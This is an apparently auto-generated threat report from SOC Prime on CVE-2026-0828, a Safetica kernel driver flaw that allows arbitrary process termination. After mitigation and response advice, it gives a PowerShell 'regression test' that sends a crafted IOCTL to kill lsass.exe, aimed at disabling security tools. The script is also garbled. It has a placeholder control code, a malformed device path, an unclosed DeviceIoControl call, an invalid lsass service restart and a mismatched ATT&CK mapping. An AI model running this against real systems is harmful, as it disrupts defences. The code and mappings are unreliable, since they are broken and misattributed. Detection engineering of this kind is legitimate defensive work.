SOC Prime Bias: Critical

26 Jan 2026 21:54
newspaper icon Software Engineering Institute

Safetica contains a kernel driver vulnerability

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Safetica contains a kernel driver vulnerability
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A flaw in Safetica’s ProcessMonitorDriver.sys kernel driver lets an unprivileged user abuse an IOCTL interface to terminate arbitrary system processes. This can enable denial-of-service and the disruption of security tools on affected endpoints. The issue can be abused to kill EDR agents and other critical services, reducing defensive coverage quickly. No vendor patch is currently available.

Investigation

The report documents CVE-2026-0828 in ProcessMonitorDriver.sys across Safetica DLP client versions. It shows that weak input validation allows process termination to occur with elevated driver privileges via crafted IOCTL calls. The impact on endpoint security monitoring is emphasized.

Mitigation

Monitor for suspicious IOCTL calls to the driver, rely on EDR or host telemetry, and restrict driver access using Windows Group Policy, WDAC, or AppLocker. Until a fix is released, block untrusted binaries from interacting with ProcessMonitorDriver.sys.

Response

Detect abnormal IOCTL activity targeting ProcessMonitorDriver.sys, isolate affected systems, and apply policy controls to deny driver access. Increase logging, alert on unprivileged interactions, and consider disabling the driver as a temporary workaround.

Attack Flow

We are still updating this part. Sign up to get notified

Notify Me

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The red‑team operator aims to abuse the vulnerable ProcessMonitorDriver.sys driver to terminate an arbitrary high‑privilege process (lsass.exe). They achieve this by crafting a malicious IOCTL payload that instructs the driver to close the target PID’s handle, thereby hijacking execution flow (T1574) and evading typical defense mechanisms (T1211). The steps are:

    1. Resolve the PID of lsass.exe.
    2. Open a handle to the vulnerable driver (\.ProcessMonitorDriver).
    3. Build an IOCTL buffer containing the target PID and a command code that triggers process termination.
    4. Invoke DeviceIoControl with a malicious control code (0xdeadbeef).
    5. Close the driver handle.

  • Regression Test Script:

    # Exploit Simulation for ProcessMonitorDriver.sys (CVE‑2026‑0828)
# -------------------------------------------------------------
# This script sends a malicious IOCTL to the vulnerable driver to
# terminate the LSASS process, generating the Sysmon EventID 10
# that the detection rule watches for.

# 1. Locate LSASS PID
$targetProcess = Get-Process -Name lsass -ErrorAction Stop
$targetPid = $targetProcess.Id
Write-Host "Target PID (lsass): $targetPid"

# 2. Open a handle to the driver
$driverPath = "\.ProcessMonitorDriver"
$file = [System.IO.File]::Open($driverPath, 'Open', 'ReadWrite', 'None')
$handle = $file.SafeFileHandle

# 3. Build the malicious IOCTL buffer (PID + dummy data)
$bufferSize = 8
$buffer = New-Object byte[] $bufferSize
[BitConverter]::GetBytes([uint32]$targetPid).CopyTo($buffer, 0)
[BitConverter]::GetBytes([uint32]0xFFFFFFFF).CopyTo($buffer, 4) # filler

# 4. Define the malicious IOCTL code (example: 0xdeadbeef)
$ioctlCode = 0xdeadbeef

# 5. Invoke DeviceIoControl via P/Invoke
$signature = @"
using System;
using System.Runtime.InteropServices;
public class NativeMethods {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool DeviceIoControl(
        IntPtr hDevice,
        uint dwIoControlCode,
        byte[] lpInBuffer,
        int nInBufferSize,
        byte[] lpOutBuffer,
        int nOutBufferSize,
        out int lpBytesReturned,
        IntPtr lpOverlapped);
}
"@
Add-Type $signature

$bytesReturned = 0
$outBuffer = New-Object byte[] 0
$result = [NativeMethods]::DeviceIoControl(
              $handle,
              $ioctlCode,
              $buffer,
              $buffer.Length,
              $outBuffer,
              0,
              [ref]$bytesReturned,

if ($result) {
    Write-Host "IOCTL sent successfully – LSASS termination may have occurred."
} else {
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    Write-Error "DeviceIoControl failed (Error $err)."
}

# 6. Cleanup
$file.Close()

  • Cleanup Commands:

    # Remove any lingering driver handles (best‑effort)
# Ensure LSASS is restarted if terminated (for a safe lab)
if (Get-Process -Name lsass -ErrorAction SilentlyContinue) {
    Write-Host "LSASS still running – no cleanup needed."
} else {
    Write-Host "Restarting LSASS (requires admin privileges)…"
    # On a test machine you may reboot or use a service restart cmdlet
    # Restart-Service -Name "lsass" -Force
}

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free